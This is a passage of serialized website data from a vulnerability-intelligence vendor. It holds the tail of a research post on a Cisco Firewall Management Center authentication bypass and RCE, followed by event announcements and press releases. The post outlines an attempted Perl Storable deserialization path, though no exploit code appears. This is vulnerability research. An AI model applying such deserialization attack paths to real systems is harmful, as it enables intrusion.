1,7091,1447],{"class":2247},[1471,7093,3349],{"class":1527},[1471,7095,7096,7098,7100],{"class":1473,"line":1691},[1471,7097,3354],{"class":3163},[1471,7099,1447],{"class":2247},[1471,7101,3359],{"class":1527},[1471,7103,7104,7106,7108],{"class":1473,"line":1699},[1471,7105,3364],{"class":3163},[1471,7107,1447],{"class":2247},[1471,7109,3369],{"class":1527},[1471,7111,7112,7114,7116],{"class":1473,"line":1705},[1471,7113,3194],{"class":3163},[1471,7115,1447],{"class":2247},[1471,7117,3378],{"class":1527},[1471,7119,7120],{"class":1473,"line":1733},[1471,7121,3383],{"emptyLinePlaceholder":54},[1471,7123,7124,7126,7128,7131,7133,7135,7137,7139,7141,7143,7145,7148,7150,7152],{"class":1473,"line":1773},[1471,7125,6014],{"class":1491},[1471,7127,1767],{"class":6017},[1471,7129,7130],{"class":6020},"error",[1471,7132,1767],{"class":6017},[1471,7134,5167],{"class":1491},[1471,7136,1767],{"class":6017},[1471,7138,1454],{"class":6030},[1471,7140,1767],{"class":6017},[1471,7142,1447],{"class":1491},[1471,7144,1767],{"class":6038},[1471,7146,7147],{"class":6041},"Error: Magic number checking on storable file failed at \u002Fusr\u002Flib64\u002Fperl5\u002F5.34.1\u002Fx86_64-linux\u002FStorable.pm line 421, at \u002Fusr\u002Flocal\u002Fsf\u002Flib\u002Fperl\u002F5.34.1\u002FSF\u002FUtil.pm line 2069.",[1471,7149,5808],{"class":2257},[1471,7151,1767],{"class":6038},[1471,7153,6103],{"class":1491},[184,7155,7156,7157,7160,7161,1447],{},"Since the Storable module directly enables the ",[1277,7158,7159],{},"$Storable::Eval"," setting, there is a high likelihood that the module may be useful for attackers. The Storable module even calls this pattern out directly as ",[274,7162,7165],{"href":7163,"rel":7164},"https:\u002F\u002Fmetacpan.org\u002Fpod\u002FStorable#SECURITY-WARNING",[278],"potentially vulnerable",[184,7167,7168],{},[187,7169],{"alt":7170,"src":7171},"Storable serialization warning.","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079\u002Fstorable-warning.png",[184,7173,7174,7175,7178,7179,7181],{},"After examining Storable test cases and generating Storable data that was written via the license path, the team was eventually able to generate ",[1277,7176,7177],{},"CODE"," Perl-serialized data and interact with the ",[1277,7180,5541],{}," logic. We were unable to find a sink or gadget that was a candidate for bootstrapping to code execution, however, before we found the installer path to RCE. It’s likely that some Perl wizard out there will be able to find an additional path to execution using this logic.",[184,7183,7184,7185,7190],{},"An exploit, PCAPs, a YARA rule, and network signatures for five different variants ",[274,7186,7189],{"href":7187,"rel":7188},"https:\u002F\u002Fdocs.vulncheck.com\u002Finitial-access\u002F2026-03-20#cve-2026-20079-cisco-firewall-management-center-authentication-bypass",[278],"are available"," to VulnCheck Initial Access Intelligence customers for CVE-2026-20079.",[246,7192,302],{"id":301},[184,7194,7195,7196,1925,7201,7206,7207,1201],{},"VulnCheck’s Initial Access Intelligence team is always on the hunt for new exploits and fresh shells. By delivering machine-consumable, evidence-driven intelligence on new vulnerabilities and how real attackers can use them in the wild, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation without relying on inaccurate scores or delayed consensus. For more research like this, see ",[274,7197,7200],{"href":7198,"rel":7199},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fcisco-sd-wan-manager-vulns",[278],"Herding Cats: Recent Cisco SD-WAN Manager Vulnerabilities",[274,7202,7205],{"href":7203,"rel":7204},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Ftriofox-exploit-cve-2025-12480",[278],"Tales from the Exploit Mines: Gladinet Triofox CVE-2025-12480 RCE",", and ",[274,7208,7211],{"href":7209,"rel":7210},"https:\u002F\u002Fwww.vulncheck.com\u002Fblog\u002Fsmartermail-connecttohub-rce-cve-2026-24423",[278],"Street Smarts: SmarterMail ConnectToHub Unauthenticated RCE (CVE-2026-24423)",[184,7213,7214,7215,7220,7221,7226,7227,1925,7231,7206,7235,7239],{},"Sign up for the VulnCheck community today to get free access to our ",[274,7216,7219],{"href":7217,"rel":7218},"https:\u002F\u002Fwww.vulncheck.com\u002Fkev",[278],"VulnCheck KEV",", enjoy our comprehensive ",[274,7222,7225],{"href":7223,"rel":7224},"https:\u002F\u002Fconsole.vulncheck.com\u002Fbrowse",[278],"vulnerability data",", and request a trial of our ",[274,7228,67],{"href":7229,"rel":7230},"https:\u002F\u002Fwww.vulncheck.com\u002Fproduct\u002Finitial-access-intelligence",[278],[274,7232,72],{"href":7233,"rel":7234},"https:\u002F\u002Fwww.vulncheck.com\u002Fproduct\u002Fip-intelligence",[278],[274,7236,62],{"href":7237,"rel":7238},"https:\u002F\u002Fwww.vulncheck.com\u002Fproduct\u002Fexploit-intelligence",[278]," products.",[7241,7242,7243],"style",{},"html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .shWJe, html code.shiki .shWJe{--shiki-light:#F76D47;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sHsBP, html code.shiki .sHsBP{--shiki-light:#E53935;--shiki-default:#22863A;--shiki-dark:#85E89D;--shiki-sepia:#F92672}html pre.shiki code .s_lYk, html code.shiki .s_lYk{--shiki-light:#9C3EDA;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sJhdN, html code.shiki .sJhdN{--shiki-light:#E53935;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .sTNss, html code.shiki .sTNss{--shiki-light:#9C3EDA;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .sHBcC, html code.shiki .sHBcC{--shiki-light:#E2931D;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sSsL9, html code.shiki .sSsL9{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .saDeg, html code.shiki .saDeg{--shiki-light:#39ADB5;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sEff5, html code.shiki .sEff5{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .s_MOj, html code.shiki .s_MOj{--shiki-light:#E2931D;--shiki-light-font-style:inherit;--shiki-default:#005CC5;--shiki-default-font-style:inherit;--shiki-dark:#79B8FF;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sh1VR, html code.shiki .sh1VR{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sINAO, html code.shiki .sINAO{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#CFCFC2}html pre.shiki code .sQqfL, html code.shiki .sQqfL{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#F8F8F2}html pre.shiki code .s91G_, html code.shiki .s91G_{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#F8F8F2}",{"title":148,"searchDepth":149,"depth":149,"links":7245},[7246,7249,7250,7251,7252,7253,7254,7255],{"id":1271,"depth":149,"text":1272,"children":7247},[7248],{"id":1348,"depth":1498,"text":1349},{"id":1380,"depth":149,"text":1381},{"id":1892,"depth":149,"text":1893},{"id":3665,"depth":149,"text":3666},{"id":4117,"depth":149,"text":4118},{"id":5483,"depth":149,"text":5484},{"id":6357,"depth":149,"text":6358},{"id":301,"depth":149,"text":302},"2026-03-26T17:00:00-05:00","VulnCheck's Initial Access Intelligence team analysis of CVE-2026-20079, an authentication bypass and remote code execution vulnerability in Cisco Secure Firewall Management Center.",{"slug":7259},"cisco-fmc-auth-bypass-cve-2026-20079","\u002Fblog\u002Fcisco-fmc-auth-bypass-cve-2026-20079",{"title":1241,"description":7257},"blog\u002Fcisco-fmc-auth-bypass-cve-2026-20079",[331,7264],"vuln-intel","wvTtNWgRKq8KYAYbQkdRO_i8uIwp6Md9c-MtK1Z-a4w",[7267,7413,7444],{"id":7268,"title":7269,"authors":6,"body":7270,"date":7405,"description":7406,"extension":153,"featured":54,"image":7407,"meta":7408,"navigation":54,"path":7409,"seo":7410,"stem":7411,"__hash__":7412},"events\u002Fevents\u002Fmeet-vulncheck-at-vulncon-2026.md","Meet VulnCheck at VulnCon 2026",{"type":145,"value":7271,"toc":7403},[7272,7283,7290,7296,7317,7337,7356,7373,7393,7400],[184,7273,7274,7275,7278,7279,7282],{},"Join ",[478,7276,7277],{},"VulnCheck at CVE | FIRST Vulnerability Conference 2026 (VulnCon 2026) and Annual CNA Summit",", where the global vulnerability management community gathers to collaborate, exchange research, and advance the vulnerability ecosystem. The conference takes place ",[478,7280,7281],{},"April 13 - 16"," in Scottsdale, Arizona, bringing together researchers, vendors, and defenders working to improve how vulnerabilities are discovered, prioritized, and remediated.",[184,7284,7285,7286,7289],{},"VulnCheck is excited to serve as a ",[478,7287,7288],{},"Platinum Sponsor"," of VulnCon 2026.",[184,7291,7292,7295],{},[478,7293,7294],{},"VulnCheck Speaking Sessions:"," Our researchers and experts will be presenting multiple sessions during VulnCon 2026, sharing insights into vulnerability exploitation, CVE ecosystem dynamics, and vulnerability prioritization.",[184,7297,7298,7301,7304,7307,7308,7310,7313,7314,7316],{},[478,7299,7300],{},"Identifying Exploited and Likely-to-Be-Exploited Vulnerabilities",[7302,7303],"br",{},[478,7305,7306],{},"Speakers:"," Patrick Garrity, Wade Sparks ",[7302,7309],{},[478,7311,7312],{},"Date | Time:"," April 14 at 4:35 p.m. MT ",[7302,7315],{}," This session explores how VulnCheck identifies vulnerabilities that are actively exploited or likely to be exploited even before CVE assignment. The talk will walk through VulnCheck’s research workflow for correlating exploitation evidence from multiple intelligence sources, including exploit code, advisories, detection telemetry, and third-party threat intelligence, to identify gaps and coordinate CVE assignment when necessary. Attendees will learn how collaborative research can improve visibility into emerging threats and strengthen the vulnerability ecosystem.",[184,7318,7319,7322,7324,7327,7328,7330,7333,7334,7336],{},[478,7320,7321],{},"Women Belong in Cyber: The Women of FIRST SIG",[7302,7323],{},[478,7325,7326],{},"Speaker",": Khushali Dalal ",[7302,7329],{},[478,7331,7332],{},"Date | Time: April 15"," 4:30 p.m. MT ",[7302,7335],{},"\nJoin the Women of FIRST SIG for an informational session focused on building a more inclusive and supportive cybersecurity community. This group of gender-diverse security practitioners is dedicated to advancing the participation of women in cybersecurity through mentorship, knowledge sharing, and networking. Learn how the SIG supports individuals at every stage, from students and early-career professionals to those re-entering the workforce, and how you can get involved in helping close the gender gap in the industry.",[184,7338,7339,7342,7344,7347,7348,7350,7352,7353,7355],{},[478,7340,7341],{},"The Myth of the Meteoric Rise in Vulnerabilities",[7302,7343],{},[478,7345,7346],{},"Speaker:"," Scott Moore ",[7302,7349],{},[478,7351,7312],{}," April 16 at 10:30 a.m. MT ",[7302,7354],{},"\nThis session challenges the common narrative that rising vulnerability counts reflect declining software security. While CVE disclosures increased significantly in recent years, the rise is often influenced by reporting incentives, expanded coverage across ecosystems, and academic initiatives, rather than a direct increase in exploitable risk. Scott Moore will examine the structural drivers behind CVE growth and explain how inflated counts can distort risk perception, misdirect remediation efforts, and obscure real progress in secure development.",[184,7357,7358,7361,7363,7365,7366,7368,7352,7370,7372],{},[478,7359,7360],{},"AI Is Writing Your Bug Reports. Can You Tell?",[7302,7362],{},[478,7364,7346],{}," Khushali Dalal ",[7302,7367],{},[478,7369,7312],{},[7302,7371],{}," In this interactive session, attendees will evaluate real-world–inspired vulnerability reports and determine whether they were written by a human researcher, generated by AI, or created through a hybrid approach. As the session progresses, additional context will be revealed,missing proof-of-concept details, contradictory technical claims, hallucinated CVEs, reused templates, and subtle credibility signals.The audience will vote and debate in real time, followed by guided analysis on how PSIRT teams distinguish signal from noise when AI is involved. Rather than framing AI as purely a problem or solution, this talk focuses on practical detection methods, validation strategies, and process adaptations security teams can implement today. It also highlights real decision-making challenges and lessons learned from live vulnerability response programs.",[184,7374,7375,7378,7380,7383,7384,7386,7389,7390,7392],{},[478,7376,7377],{},"Panel: Supply Chains and Malware Campaigns: Is CVE the Right Way to Name the Game?",[7302,7379],{},[478,7381,7382],{},"Panelist:"," Caitlin Condon ",[7302,7385],{},[478,7387,7388],{},"Date | Time: April 16"," at 1:15 p.m. MT ",[7302,7391],{}," This panel examines the role of CVE identifiers in tracking vulnerabilities tied to supply-chain compromises and malware campaigns. The discussion will bring together multiple perspectives from across the vulnerability ecosystem to explore the future of vulnerability identification and coordination.",[184,7394,7395,7396,7399],{},"Beyond attending our speaking sessions, be sure to visit our ",[478,7397,7398],{},"exhibit table on April 14 and 15"," to meet the team, explore the latest research on vulnerability exploitation, and discover how our exploit intelligence can help organizations focus on the vulnerabilities that truly matter.",[184,7401,7402],{},"Don’t miss this chance to connect with our experts and see firsthand how we are helping organizations stay ahead of evolving cyber threats.",{"title":148,"searchDepth":149,"depth":149,"links":7404},[],"2026-04-13","Join VulnCheck at CVE | FIRST Vulnerability Conference 2026 (VulnCon 2026) and Annual CNA Summit, where the global vulnerability management community gathers to collaborate, exchange research, and advance the vulnerability ecosystem. The conference takes place April 13 - 16 in Scottsdale, Arizona, bringing together researchers, vendors, and defenders working to improve how vulnerabilities are discovered, prioritized, and remediated.","events\u002Fvulncon.jpg",{},"\u002Fevents\u002Fmeet-vulncheck-at-vulncon-2026",{"title":7269,"description":7406},"events\u002Fmeet-vulncheck-at-vulncon-2026","iIQac9O6KPYzC6j47uI-cZWPsNQ_ETcz6A2weTGF9D4",{"id":7414,"title":7415,"authors":6,"body":7416,"date":7437,"description":7423,"extension":153,"featured":7438,"image":6,"meta":7439,"navigation":54,"path":7440,"seo":7441,"stem":7442,"__hash__":7443},"events\u002Fevents\u002Fjoin-the-vulncheck-team-in-san-francisco.md","Join the VulnCheck Team in San Francisco for Meetings and Dinners",{"type":145,"value":7417,"toc":7435},[7418,7421,7424,7432],[184,7419,7420],{},"VulnCheck is heading to San Francisco from March 23 - 26, 2026, and we are looking forward to connecting with friends, partners, and security leaders while we are in town.",[184,7422,7423],{},"Throughout the week, we will be hosting a series of exclusive dinners and private, invite-only meetings, designed for meaningful conversations around emerging vulnerabilities, threat intelligence, and what’s next for proactive security teams.",[184,7425,7426,7427,7431],{},"Want in? Email us at ",[274,7428,7430],{"href":7429},"mailto:events@vulncheck.com","events@vulncheck.com"," to secure your spot.",[184,7433,7434],{},"See you in SF!",{"title":148,"searchDepth":149,"depth":149,"links":7436},[],"2026-03-23",false,{},"\u002Fevents\u002Fjoin-the-vulncheck-team-in-san-francisco",{"title":7415,"description":7423},"events\u002Fjoin-the-vulncheck-team-in-san-francisco","KoAgSvLK7xSy7VwMiLTChjNXbwlYPq2TeuYTJ6uS8Ss",{"id":7445,"title":7446,"authors":7447,"body":7453,"date":7490,"description":7491,"extension":153,"featured":7438,"image":6,"meta":7492,"navigation":54,"path":7493,"seo":7494,"stem":7495,"__hash__":7496},"events\u002Fevents\u002Fwicys-2026.md","VulnCheck is Sponsoring WiCyS 2026",[7448],{"name":7449,"avatar":7450,"link":7451,"linkName":7452},"Anthony Bettini","https:\u002F\u002Fwww.vulncheck.com\u002Flogo.png","https:\u002F\u002Fwww.vulncheck.com","VulnCheck",{"type":145,"value":7454,"toc":7488},[7455,7462,7465,7468,7477],[184,7456,7457,7458,7461],{},"VulnCheck is proud to be a Gold sponsor of ",[478,7459,7460],{},"WiCyS 2026",", which takes place March 11-13.",[184,7463,7464],{},"The premier event dedicated to advancing women and underrepresented professionals in cybersecurity. WiCyS brings together practitioners, leaders, recruiters, and innovators from across the public and private sectors to foster connection, career growth, and community impact.",[184,7466,7467],{},"At WiCyS 2026, VulnCheck looks forward to engaging in meaningful conversations around vulnerability intelligence, mission-driven security work, and the future of the cyber workforce.",[184,7469,7470,7471,7476],{},"Be sure to connect with the VulnCheck team to learn what’s new and how you can be part of our growing mission. We are always looking for passionate, talented individuals to join us; visit our ",[274,7472,7475],{"href":7473,"rel":7474},"https:\u002F\u002Fwww.vulncheck.com\u002Fcareers",[278],"careers page"," to learn more.",[184,7478,7479,7480,7482,7483,1201],{},"Learn more about ",[478,7481,7460],{}," and register on the ",[274,7484,7487],{"href":7485,"rel":7486},"https:\u002F\u002Fwww.wicys.org\u002Fevents\u002Fwicys-2026\u002F",[278],"WiCyS website",{"title":148,"searchDepth":149,"depth":149,"links":7489},[],"2026-03-11","VulnCheck is proud to be a Gold sponsor of WiCyS 2026, which takes place March 11-13. The premier event dedicated to advancing women and underrepresented professionals in cybersecurity.",{},"\u002Fevents\u002Fwicys-2026",{"title":7446,"description":7491},"events\u002Fwicys-2026","rJhjMM_j_bxZHaRrbDCmPuCDrw51G98d-Gol5b4Cr5c",[7498,7612,7735],{"id":7499,"title":7500,"articles":6,"authors":7501,"body":7504,"date":7605,"description":7606,"extension":153,"meta":7607,"navigation":54,"path":7608,"seo":7609,"stem":7610,"__hash__":7611},"press\u002Fpress\u002Freal-world-exploit-report.md","VulnCheck Exploit Intelligence Report Separates Real-World Exploitation Activity from Theoretical Vulnerability Risk",[7502],{"name":7449,"avatar":7503},"\u002Fteam\u002Fanthony-bettini.jpg",{"type":145,"value":7505,"toc":7601},[7506,7520,7523,7531,7534,7548,7555,7562,7569,7571,7590,7594],[184,7507,7508,7511,7512,7511,7515,7519],{},[478,7509,7510],{},"LEXINGTON, Mass."," — ",[478,7513,7514],{},"February 25, 2026",[274,7516,7452],{"href":7517,"rel":7518},"https:\u002F\u002Fwww.vulncheck.com\u002F",[278],", the exploit intelligence company, today released the 2026 VulnCheck Exploit Intelligence Report (VEIR), a first-of-its-kind analysis of real-world exploitation trends and attacker behavior, along with its inaugural list of the 50 most routinely targeted vulnerabilities of the past year. By separating vulnerability disclosure data from confirmed exploitation, the report is designed to help security teams prioritize remediation based on operational risk instead of raw volume.",[184,7521,7522],{},"The VEIR shows that while CVE disclosures and public proof-of-concept code increased significantly in 2025, just 1% of vulnerabilities were confirmed to be exploited in the wild, with a small subset driving disproportionate real-world impact. The report is based on data from over two dozen unique VulnCheck indices, more than 500 data sources and proprietary first-party intelligence. It examines attacker behavior and which vulnerabilities drove confirmed compromise during a year marked by AI-generated exploit code, geopolitical tension and uncertainty surrounding core vulnerability programs.",[7524,7525,7528],"author-quote",{"author":7526,"position":7527},"Jacob Baines","Chief Technology Officer, VulnCheck",[184,7529,7530],{},"The data shows that exploitation is concentrated in a very small number of vulnerabilities, but those vulnerabilities are being weaponized faster and at greater scale. At the same time, the volume of exploit content, much of it AI-generated slop, is making it harder to distinguish real operational risk from background noise.",[184,7532,7533],{},"In 2025, VulnCheck tracked more than 14,400 exploits developed for 10,480 unique 2025 CVEs, a 16.5% year-over-year increase in same-year exploit coverage. Much of that growth was associated with AI-generated proof-of-concept code, including nonfunctional or misleading exploit content. Other key findings from the 2026 VEIR report include:",[227,7535,7536,7539,7542,7545],{},[230,7537,7538],{},"56.4% of 2025 ransomware CVEs were first identified through active zero-day exploitation, and roughly one-third still lacked public or commercial exploits as of January 2026",[230,7540,7541],{},"A 13% decrease in new vulnerabilities linked to named state-sponsored groups overall, with China-linked exploit attributions increasing and Iranian-linked activity decreasing",[230,7543,7544],{},"884 vulnerabilities were added to VulnCheck’s Known Exploited Vulnerabilities dataset with 47.7% carrying 2025 CVE identifiers",[230,7546,7547],{},"Deep dives into React2Shell, SharePoint exploitation, and ransomware groups including Cl0p, DragonForce, Earth Lamia, and RomCom.",[7524,7549,7552],{"author":7550,"position":7551},"Caitlin Condon","Vice President of Research, VulnCheck",[184,7553,7554],{},"Organizations are managing more disclosures than ever, but only a small fraction of those vulnerabilities see active exploitation. The difficulty is identifying that fraction early enough to act. This analysis focuses on confirmed exploitation trends to improve prioritization decisions.",[184,7556,7557,7558,1201],{},"The report also includes VulnCheck’s first-ever Routinely Targeted Vulnerabilities list, a rankable set of 50 CVEs disclosed and exploited in 2025 that demonstrated sustained attacker interest. The list is also available separately, along with associated metadata. See the ",[274,7559,7561],{"href":7560},"\u002F2025-routinely-targeted-vulnerabilities","full list here",[184,7563,7564,7565,1201],{},"The 2026 VulnCheck Exploit Intelligence Report is ",[274,7566,7568],{"href":120,"rel":7567,"target":93},[278],"available here",[246,7570,302],{"id":301},[184,7572,7573,7574,1883,7579,7584,7585,1201],{},"VulnCheck closes the exploitation-timing gap by enabling security teams to operate on attacker timelines instead of disclosure timelines. By delivering machine-consumable, evidence-driven intelligence on when vulnerabilities become exploitable and how attackers actually use them, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation without relying on scores or delayed consensus. Follow the company on ",[274,7575,7578],{"href":7576,"rel":7577},"https:\u002F\u002Fwww.linkedin.com\u002Fcompany\u002Fvulncheck\u002F?viewAsMember=true",[278],"LinkedIn",[274,7580,7583],{"href":7581,"rel":7582},"https:\u002F\u002Fx.com\u002Fvulncheckai",[278],"X",". To learn more about VulnCheck, visit ",[274,7586,7589],{"href":7587,"rel":7588},"https:\u002F\u002Fvulncheck.com\u002F",[278],"https:\u002F\u002Fvulncheck.com",[246,7591,7593],{"id":7592},"media-contacts","Media Contacts",[184,7595,7596,7597],{},"Jason Vancura\nMarketbridge for VulnCheck\n",[274,7598,7600],{"href":7599},"mailto:vulncheck@marketbridge.com","vulncheck@marketbridge.com",{"title":148,"searchDepth":149,"depth":149,"links":7602},[7603,7604],{"id":301,"depth":149,"text":302},{"id":7592,"depth":149,"text":7593},"2026-02-25","Analysis Finds 1% of Vulnerabilities Were Exploited in the Wild in 2025 and Identifies the 50 Most Routinely Targeted Flaws of Last Year",{},"\u002Fpress\u002Freal-world-exploit-report",{"title":7500,"description":7606},"press\u002Freal-world-exploit-report","2qs6UzepF_mzu5lZNbLHsopOx9X2Pei3k8z4aasDvgc",{"id":7613,"title":7614,"articles":7615,"authors":7620,"body":7626,"date":523,"description":7727,"extension":153,"meta":7728,"navigation":54,"path":7731,"seo":7732,"stem":7733,"__hash__":7734},"press\u002Fpress\u002Fvulncheck-joins-operational-technology-cybersecurity-coalition.md","VulnCheck Joins Operational Technology Cybersecurity Coalition to Advance Real-Time Exploit Intelligence",[7616],{"title":7617,"source":7618,"link":7619,"date":7605},"VulnCheck joins OT Cybersecurity Coalition to bolster industrial exploit intelligence, boost vulnerability prioritization","Industrial Cyber","https:\u002F\u002Fwww.vulncheck.com\u002Fpress\u002Fvulncheck-joins-operational-technology-cybersecurity-coalition",[7621],{"name":7622,"avatar":7623,"link":7624,"linkName":7625},"Tom Bain","\u002Fteam\u002Fthomas-bain.jpg","https:\u002F\u002Ftwitter.com\u002Ftmbainjr1","@tmbainjr1",{"type":145,"value":7627,"toc":7723},[7628,7644,7651,7654,7660,7663,7670,7673,7683,7687,7690,7698,7700,7714],[184,7629,7630,7633,7634,7639,7640,7643],{},[478,7631,7632],{},"WASHINGTON, D.C. and LEXINGTON, Mass — Feb. 24, 2026 —"," ",[274,7635,7638],{"href":7636,"rel":7637},"https:\u002F\u002Fwww.otcybercoalition.org\u002F",[278],"The Operational Technology Cybersecurity Coalition"," (OTCC) and ",[274,7641,7452],{"href":7451,"rel":7642},[278]," today announced that VulnCheck has joined the coalition as its newest member, expanding efforts to strengthen the cybersecurity of operational technology (OT) environments and protect critical infrastructure as threats targeting industrial control systems and network-edge devices continue to increase.",[7524,7645,7648],{"author":7646,"position":7647},"Arun Chetty","Vice President at National Grid Partners",[184,7649,7650],{},"There is growing urgency within the critical infrastructure segment to modernize how we prioritize and address potential software vulnerabilities. It’s clear that attackers are moving faster than defenders can triage flaws, and VulnCheck provides continuously updated intelligence at machine speed and with more precision than any other organization we’ve seen. VulnCheck's contribution to the OTCC's efforts in safeguarding critical infrastructure will enrich the global intelligence ecosystem.",[184,7652,7653],{},"The OTCC focuses on improving OT security and advancing policies that strengthen critical infrastructure resilience. Representing the entire OT lifecycle, the OT Cyber Coalition believes that the strongest, most effective approach to securing our nation’s critical infrastructure is one that is open, vendor-neutral, and allows for diverse solutions and information sharing without compromising cybersecurity defenses. VulnCheck delivers threat intelligence solutions that power cybersecurity products and critical response workflows used to protect the global economy, critical infrastructure, enterprises and governments. By joining OTCC, VulnCheck strengthens the group’s ability to ground policy discussions and infrastructure defense strategies in current threat activity.",[7524,7655,7657],{"author":7449,"position":7656},"Founder and CEO at VulnCheck",[184,7658,7659],{},"Network-edge devices, particularly in OT environments, are among the most highly targeted assets. Greater visibility into exploited flaws and active threats is essential to helping defenders reduce risk in critical infrastructure environments. Through OTCC membership, we can help ensure policymakers and operators have access to timely, actionable exploit intelligence that reflects real-world activity.",[184,7661,7662],{},"VulnCheck provides machine-readable exploit intelligence to help organizations identify and prioritize vulnerabilities that pose an active risk. Its platform analyzes first-party evidence of exploitation and reviews more than 500 million records across all known CVEs from over 500 sources to surface actionable intelligence. Data sources are refreshed multiple times per day, providing updated context on threat actor activity, ransomware associations and publicly available exploit proof-of-concept code. Automating this analysis removes operational bottlenecks and enables security teams to respond more quickly to emerging threats.",[7524,7664,7667],{"author":7665,"position":7666},"Tatyana Bolton","Executive Director, OTCC",[184,7668,7669],{},"Operational technology environments face increasingly sophisticated and persistent threats. Adding VulnCheck’s exploit intelligence capabilities strengthens the coalition’s collective ability to inform data-driven public policy discussions and support organizations responsible for securing critical infrastructure.",[184,7671,7672],{},"VulnCheck 